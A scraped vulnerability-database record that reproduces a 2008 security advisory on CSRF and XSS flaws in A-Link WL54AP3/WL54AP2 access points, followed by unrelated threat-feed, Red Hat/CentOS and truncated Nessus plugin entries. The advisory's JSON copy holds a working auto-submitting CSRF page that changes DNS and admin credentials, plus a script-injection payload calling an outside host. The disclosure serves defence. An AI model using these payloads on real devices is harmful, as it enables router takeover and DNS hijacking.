ID SECURITYVULNS:DOC:20811 Type securityvulns Reporter Securityvulns Modified 2008-11-04T00:00:00
Description
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Louhi Networks Information Security Research
Security Advisory
Advisory: A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability
Release Date: 2008/10/31
Last Modified: 2008/10/28
Authors: Jussi Vuokko, CISSP [jussi.vuokko@louhi.fi]
Henri Lindberg [henri.lindberg@louhi.fi]
Device: A-Link WL54AP3 and WL54AP2 (any firmware)
Severity: CSRF and XSS in management interface
Risk: Moderate
Vendor Status: Vendor has released an updated version
References: http://www.louhinetworks.fi/advisory/alink_081028.txt
Overview:
Quote from http://www.a-link.com/
"WLAN Access point 54MB, 4-port
Wlan Access point, wireless 54Mbps, DSSS, 802.11g-standard based and
it's compatible also with other manufacturers cards."
During an audit of A-Link WLAN54AP3 it was discovered that a cross
site request forgery vulnerability exists in the management
interface. It is possible for an attacker to perform any
administrative actions in the management interface, if victim
can be lured or forced to view malicious content. These administrative
actions include e.g. changing admin user's username and password,
DNS settings etc.
In addition, it was discovered that no input validation or output
encoding is performed in management interface, thus making it
vulnerable to cross-site scripting.
By default admin password is blank and no authentication is performed
for requests to administrative interface. As ordinary consumers usually
use out-of-the-box settings, this vulnerability offers same kind of
phishing possibilities as used in Banamex attacks[1].
A-Link WLAN54AP2 (EOL) is vulnerable to this threat as well.
A-Link WLAN54AP3 does not validate the origin of an HTTP request. If
attacker is able to make user view malicious content, the WLAN54AP3
device can be controlled by submitting suitable forms. Attacker is
effectively acting as an administrator.
Successful attack requires that the attacker knows the management
interface address for the target device (default IP address is
192.168.1.254). As the management interface does not have logout
functionality, user can be vulnerable to this attack even after
closing a tab containing the management interface (if user does not
close the browser window or clear cookies and depending on browser
behaviour) or if default blank password is used.
Proof of Concept:
CSRF:
Example form (changes DNS servers, enables WAN web server access
and changes user's username and password):
Add following content to management interface's Management - DDNS -
Domain Name:
""><script src="http://l7.fi"></script><p
Workaround:
-
Solution:
Include a random user-specific token in forms. More information:
http://en.wikipedia.org/wiki/Cross-site_request_forgery
Perform an input validation and/or an output encoding. More information:
http://en.wikipedia.org/wiki/Cross_site_scripting
Use secure out-of-the-box configuration (for example generate
default passwords based on device serial or MAC address using
a secure cryptographic algorithm).
Disclosure Timeline:
September 2008 - Contacted A-Link by email
October 2008 - Vendor released an updated version
October 2008 - Advisory was released
Copyright 2008 Louhi Networks Oy. All rights reserved.
-----BEGIN PGP SIGNATURE-----
{"id": "SECURITYVULNS:DOC:20811", "bulletinFamily": "software", "title": "A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\n Louhi Networks Information Security Research\r\n Security Advisory\r\n\r\n\r\n Advisory: A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability\r\n Release Date: 2008/10/31\r\nLast Modified: 2008/10/28\r\n Authors: Jussi Vuokko, CISSP [jussi.vuokko@louhi.fi]\r\n Henri Lindberg [henri.lindberg@louhi.fi]\r\n\r\n Device: A-Link WL54AP3 and WL54AP2 (any firmware)\r\n Severity: CSRF and XSS in management interface\r\n Risk: Moderate\r\nVendor Status: Vendor has released an updated version\r\n References: http://www.louhinetworks.fi/advisory/alink_081028.txt\r\n\r\n\r\nOverview:\r\n\r\n Quote from http://www.a-link.com/\r\n "WLAN Access point 54MB, 4-port\r\n Wlan Access point, wireless 54Mbps, DSSS, 802.11g-standard based and\r\n it's compatible also with other manufacturers cards."\r\n\r\n During an audit of A-Link WLAN54AP3 it was discovered that a cross\r\n site request forgery vulnerability exists in the management\r\n interface. It is possible for an attacker to perform any\r\n administrative actions in the management interface, if victim\r\n can be lured or forced to view malicious content. These administrative\r\n actions include e.g. changing admin user's username and password,\r\n DNS settings etc.\r\n\r\n In addition, it was discovered that no input validation or output\r\n encoding is performed in management interface, thus making it\r\n vulnerable to cross-site scripting.\r\n\r\n By default admin password is blank and no authentication is performed\r\n for requests to administrative interface. As ordinary consumers usually\r\n use out-of-the-box settings, this vulnerability offers same kind of\r\n phishing possibilities as used in Banamex attacks[1].\r\n\r\n A-Link WLAN54AP2 (EOL) is vulnerable to this threat as well.\r\n\r\n [1] http://www.google.fi/search?q=banamex+phishing+dns+poison\r\n\r\n\r\nDetails:\r\n\r\n A-Link WLAN54AP3 does not validate the origin of an HTTP request. If\r\n attacker is able to make user view malicious content, the WLAN54AP3\r\n device can be controlled by submitting suitable forms. Attacker is\r\n effectively acting as an administrator.\r\n\r\n Successful attack requires that the attacker knows the management\r\n interface address for the target device (default IP address is\r\n 192.168.1.254). As the management interface does not have logout\r\n functionality, user can be vulnerable to this attack even after\r\n closing a tab containing the management interface (if user does not\r\n close the browser window or clear cookies and depending on browser\r\n behaviour) or if default blank password is used.\r\n\r\n\r\nProof of Concept:\r\n\r\n CSRF:\r\n\r\n Example form (changes DNS servers, enables WAN web server access\r\n and changes user's username and password):\r\n\r\n <html>\r\n <body onload="document.wan.submit(); document.password.submit()">\r\n <form action="http://192.168.1.254/goform/formWanTcpipSetup"\r\n method="post" name="wan">\r\n <input type="hidden" value="dnsManual" name="dnsMode" checked>\r\n <input type="hidden" name="dns1" value="216.239.32.10">\r\n <input type="hidden" name="dns2" value="216.239.32.10">\r\n <input type="hidden" name="dns3" value="216.239.32.10">\r\n <input type="hidden" name="webWanAccess" value="ON"\r\n checked="checked">\r\n </form>\r\n <form action="http://192.168.1.254/goform/formPasswordSetup"\r\n method="post" name="password">\r\n <input type="hidden" name="username" value="mallory">\r\n <input type="hidden" name="newpass" value="gotroot">\r\n <input type="hidden" name="confpass" value="gotroot">\r\n </form>\r\n </body>\r\n </html>\r\n\r\n XSS:\r\n\r\n Add following content to management interface's Management - DDNS -\r\n Domain Name:\r\n\r\n ""><script src="http://l7.fi"></script><p\r\n\r\n\r\nWorkaround:\r\n\r\n -\r\n\r\n\r\nSolution:\r\n\r\n Include a random user-specific token in forms. More information:\r\n http://en.wikipedia.org/wiki/Cross-site_request_forgery\r\n\r\n Perform an input validation and/or an output encoding. More information:\r\n http://en.wikipedia.org/wiki/Cross_site_scripting\r\n\r\n Use secure out-of-the-box configuration (for example generate\r\n default passwords based on device serial or MAC address using\r\n a secure cryptographic algorithm).\r\n\r\n\r\nDisclosure Timeline:\r\n\r\n 13. September 2008 - Contacted A-Link by email\r\n 28. October 2008 - Vendor released an updated version\r\n 31. October 2008 - Advisory was released\r\n\r\n\r\nCopyright 2008 Louhi Networks Oy. All rights reserved.\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEAREIAAYFAkkLDf0ACgkQ3TZNEGeZkm677QCdGIBR9jySnDlKCmtN7eDMUEGM\r\ny6sAn26m+4S2I50fuDFxBlaQTO6kqSTK\r\n=XEbb\r\n-----END PGP SIGNATURE-----", "published": "2008-11-04T00:00:00", "modified": "2008-11-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20811", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:28", "edition": 1, "viewCount": 24, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2018-08-31T11:10:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2595", "CVE-2018-20811", "CVE-2015-9286", "CVE-2008-7273", "CVE-2019-20811", "CVE-2008-7272"]}, {"type": "avleonov", "idList": ["AVLEONOV:6F5D66D428BD52B38D00264DDD6E861A"]}, {"type": "openbugbounty", "idList": ["OBB:211914"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32653", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:28", "rev": 2}, "vulnersScore": 5.8}, "affectedSoftware": []}
{"rst": [{"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **95[.]171.34.19** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **2**.\n First seen: 2020-01-02T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **malware**.\nASN 20811: (First IP 95.171.32.0, Last IP 95.171.63.255).\nASN Name \"BRENNERCOMAS\" and Organisation \"\".\nASN hosts 9623 domains.\nGEO IP information: City \"Trento\", Country \"Italy\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-01-02T00:00:00", "id": "RST:16FD8C59-72B0-3CE7-A31E-6AA4519021DF", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. IOC: 95.171.34.19", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **89[.]190.165.4** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **21**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **generic**.\nASN 20811: (First IP 89.190.160.0, Last IP 89.190.191.255).\nASN Name \"BRENNERCOMAS\" and Organisation \"\".\nASN hosts 9623 domains.\nGEO IP information: City \"Vittorio Veneto\", Country \"Italy\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:0127E9DC-BECE-3CB7-8AF8-08884ADA42AC", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. IOC: 89.190.165.4", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-18T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **89[.]190.180.212** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **26**.\n First seen: 2020-12-14T03:00:00, Last seen: 2021-01-18T03:00:00.\n IOC tags: **generic**.\nASN 20811: (First IP 89.190.160.0, Last IP 89.190.191.255).\nASN Name \"BRENNERCOMAS\" and Organisation \"\".\nASN hosts 9623 domains.\nGEO IP information: City \"Vittorio Veneto\", Country \"Italy\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-14T00:00:00", "id": "RST:6819B3C9-091D-322D-B817-E65A260C80E4", "href": "", "published": "2021-01-19T00:00:00", "title": "RST Threat feed. IOC: 89.190.180.212", "type": "rst", "cvss": {}}, {"lastseen": "2020-09-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **95[.]171.44.150** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **40**.\n First seen: 2020-09-19T03:00:00, Last seen: 2020-09-24T03:00:00.\n IOC tags: **generic**.\nASN 20811: (First IP 95.171.32.0, Last IP 95.171.63.255).\nASN Name \"BRENNERCOMAS\" and Organisation \"\".\nASN hosts 7816 domains.\nGEO IP information: City \"Bolzano\", Country \"Italy\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-19T00:00:00", "id": "RST:1CFFAB8C-DCA3-3E7E-820F-E63B0DEF69C5", "href": "", "published": "2020-09-25T00:00:00", "title": "RST Threat feed. IOC: 95.171.44.150", "type": "rst", "cvss": {}}], "redhat": [{"lastseen": "2020-11-24T13:31:31", "bulletinFamily": "unix", "cvelist": ["CVE-2019-20811", "CVE-2019-20907", "CVE-2020-14331", "CVE-2020-14363", "CVE-2020-14422", "CVE-2020-15586", "CVE-2020-15999", "CVE-2020-16845", "CVE-2020-25637", "CVE-2020-8177", "CVE-2020-8622", "CVE-2020-8623", "CVE-2020-8624"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang: Data race in certain net/http servers including ReverseProxy can lead to DoS (CVE-2020-15586)\n* golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs (CVE-2020-16845)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.5.20. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2020:5119\n\nSpace precludes documenting all of the container images in this advisory.\nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.5/release_notes/ocp-4-5-release-notes.html\n\nThis update fixes the following bug among others:\n\n* Previously, the Prometheus swagger definition contained a `$ref` property which could not be resolved. This caused a runtime error to occur when using the Prometheus operand creation form. This was fixed by adding a `definitions` property to schema returned by the `definitionFor` helper function so that the `$ref` property can resolve. There are no longer runtime errors when using the Prometheus operand creation form. (BZ#1885228)\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.5.20-x86_64\n\nThe image digest is sha256:78b878986d2d0af6037d637aa63e7b6f80fc8f17d0f0d5b077ac6aca83f792a0\n\n(For s390x architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.5.20-s390x\n\nThe image digest is sha256:372d9aea634d36704d8500a2f940edb3867bfde14c0e5aa19534ea5ac90083d4\n\n(For ppc64le architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.5.20-ppc64le\n\nThe image digest is sha256:030d8323cce90de6bc7ad4119ebb7f000bde06e742f6923faf76707ffe85634a\n\nAll OpenShift Container Platform 4.5 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.5/updating/updating-cluster-between-minor.html#understanding-upgrade-channels_updating-cluster-between-minor.", "modified": "2020-11-24T17:33:33", "published": "2020-11-24T17:10:00", "id": "RHSA-2020:5118", "href": "https://access.redhat.com/errata/RHSA-2020:5118", "type": "redhat", "title": "(RHSA-2020:5118) Moderate: OpenShift Container Platform 4.5.20 bug fix and golang security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:21:38", "bulletinFamily": "unix", "cvelist": ["CVE-2019-20811", "CVE-2020-14331"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* kernel: kernel: buffer over write in vgacon_scroll (CVE-2020-14331)\n\n* kernel: net-sysfs: *_queue_add_kobject refcount issue (CVE-2019-20811)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* [RHEL-7.9] net/ipv6/ip6_flowlabel.c:85 suspicious rcu_dereference_check() usage! (kernel-rt-debug) (BZ#1836846)\n\n* md/raid: sleeping function called from invalid context triggered by CKI storage/swraid/trim test (BZ#1857872)\n\n* Infinite looping when trying to acquire eventpoll->mtx during eventpoll_release_file, 2nd try (BZ#1877695)\n\n* kernel-rt: update to the latest RHEL7.9.z1 source tree (BZ#1883995)", "modified": "2020-11-10T16:55:32", "published": "2020-11-10T14:41:25", "id": "RHSA-2020:5026", "href": "https://access.redhat.com/errata/RHSA-2020:5026", "type": "redhat", "title": "(RHSA-2020:5026) Moderate: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T20:22:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-20811", "CVE-2020-14331"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: buffer over write in vgacon_scroll (CVE-2020-14331)\n\n* kernel: net-sysfs: *_queue_add_kobject refcount issue (CVE-2019-20811)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* [OSP13,mlx5] SRIOV VF still sending traffic when PF is down (BZ#1733181)\n\n* gpf panic in virtio_check_driver_offered_fxature+6 when running sg_inq on a dm map for a lost virtio_blk (BZ#1811893)\n\n* GPF panic in qlt_free_session_done+626 (BZ#1826127)\n\n* [ Brazos ] \"Core(s) per socket\" and \"Socket\" values are interchanged in lscpu output. (kernel) (BZ#1826306)\n\n* megaraid Aero: call trace observed during reboots (BZ#1828312)\n\n* Crash in mptscsih_io_done() due to buffer overrun in sense_buf_pool (BZ#1829803)\n\n* The qedf driver fails to re-establish the online F/C port state when the downstream F/C port is toggled unless a LIP is forced (BZ#1836443)\n\n* tcp_fragment() limit causes packet drop under normal TCP load (BZ#1847765)\n\n* ip link command shows state as UNKNOWN for MACVLAN interface (BZ#1848950)\n\n* Lenovo TS 7Z60 Cooper Lake: PCI BAR firmware bug (BZ#1849223)\n\n* [RHEL-7/mlx4] ipoib_flush ipoib_ib_dev_flush_light [ib_ipoib] (BZ#1858707)\n\n* Uprobes crashes processes under GDB - SIGTRAP and SIGSEGV (BZ#1861396)\n\n* kernel-3.10.0-1127.19.1.el7.x86_64 crashes after an SSH connection attempt when running as a Xen PV guest on AMD Epyc Rome (BZ#1882468)\n\n* Null ptr deref after nf_reinject->nf_queue_entry_release_refs hits Attempt to release error doing inet_sock_destruct() (BZ#1885682)\n\nUsers of kernel are advised to upgrade to these updated packages, which fix these bugs.", "modified": "2020-11-10T16:55:23", "published": "2020-11-10T14:41:13", "id": "RHSA-2020:5023", "href": "https://access.redhat.com/errata/RHSA-2020:5023", "type": "redhat", "title": "(RHSA-2020:5023) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-11-18T22:38:43", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14331", "CVE-2019-20811"], "description": "**CentOS Errata and Security Advisory** CESA-2020:5023\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: buffer over write in vgacon_scroll (CVE-2020-14331)\n\n* kernel: net-sysfs: *_queue_add_kobject refcount issue (CVE-2019-20811)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* [OSP13,mlx5] SRIOV VF still sending traffic when PF is down (BZ#1733181)\n\n* gpf panic in virtio_check_driver_offered_fxature+6 when running sg_inq on a dm map for a lost virtio_blk (BZ#1811893)\n\n* GPF panic in qlt_free_session_done+626 (BZ#1826127)\n\n* [ Brazos ] \"Core(s) per socket\" and \"Socket\" values are interchanged in lscpu output. (kernel) (BZ#1826306)\n\n* megaraid Aero: call trace observed during reboots (BZ#1828312)\n\n* Crash in mptscsih_io_done() due to buffer overrun in sense_buf_pool (BZ#1829803)\n\n* The qedf driver fails to re-establish the online F/C port state when the downstream F/C port is toggled unless a LIP is forced (BZ#1836443)\n\n* tcp_fragment() limit causes packet drop under normal TCP load (BZ#1847765)\n\n* ip link command shows state as UNKNOWN for MACVLAN interface (BZ#1848950)\n\n* Lenovo TS 7Z60 Cooper Lake: PCI BAR firmware bug (BZ#1849223)\n\n* [RHEL-7/mlx4] ipoib_flush ipoib_ib_dev_flush_light [ib_ipoib] (BZ#1858707)\n\n* Uprobes crashes processes under GDB - SIGTRAP and SIGSEGV (BZ#1861396)\n\n* kernel-3.10.0-1127.19.1.el7.x86_64 crashes after an SSH connection attempt when running as a Xen PV guest on AMD Epyc Rome (BZ#1882468)\n\n* Null ptr deref after nf_reinject->nf_queue_entry_release_refs hits Attempt to release error doing inet_sock_destruct() (BZ#1885682)\n\nUsers of kernel are advised to upgrade to these updated packages, which fix these bugs.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2020-November/035868.html\n\n**Affected packages:**\nbpftool\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\n", "edition": 1, "modified": "2020-11-18T18:02:50", "published": "2020-11-18T18:02:50", "id": "CESA-2020:5023", "href": "http://lists.centos.org/pipermail/centos-announce/2020-November/035868.html", "title": "bpftool, kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-12-01T09:37:40", "description": "The remote CentOS Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:5023 advisory.\n\n - kernel: net-sysfs: *_queue_add_kobject refcount issue (CVE-2019-20811)\n\n - kernel: kernel: buffer over write in vgacon_scroll (CVE-2020-14331)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 3, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-18T00:00:00", "title": "CentOS 7 : kernel (CESA-2020:5023)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14331", "CVE-2019-20811"], "modified": "2020-11-18T00:00:00", "cpe": ["p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:kernel-tools-libs-devel", "p-cpe:/a:centos:centos:kernel-tools", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-tools-libs", "p-cpe:/a:centos:centos:bpftool", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2020-5023.NASL", "href": "https://www.tenable.com/plugins/nessus/143049", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:5023 and\n# CentOS Errata and Security Advisory 2020:5023 respectively.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143049);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/30\");\n\n script_cve_id(\"CVE-2019-20811\", \"CVE-2020-14331\");\n script_xref(name:\"RHSA\", value:\"2020:5023\");\n\n script_name(english:\"CentOS 7 : kernel (CESA-2020:5023)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:5023 advisory.\n\n - kernel: net-sysfs: *_queue_add_kobject refcount issue (CVE-2019-20811)\n\n - kernel: kernel: buffer over write in vgacon_scroll (CVE-2020-14331)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.centos.org/pipermail/centos-announce/2020-November/035868.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e1e27c33\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/460.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/787.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14331\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(460, 787);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bpftool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'CentOS 7.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'bpftool-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'kernel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'kernel-abi-whitelists-3.10.0-1160.6.1.el7', 'release':'CentOS-7'},\n {'reference':'kernel-debug-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'kernel-debug-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'kernel-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'kernel-headers-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'kernel-tools-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'kernel-tools-libs-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'kernel-tools-libs-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'perf-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'CentOS-7'},\n {'reference':'python-perf-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'CentOS-7'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n 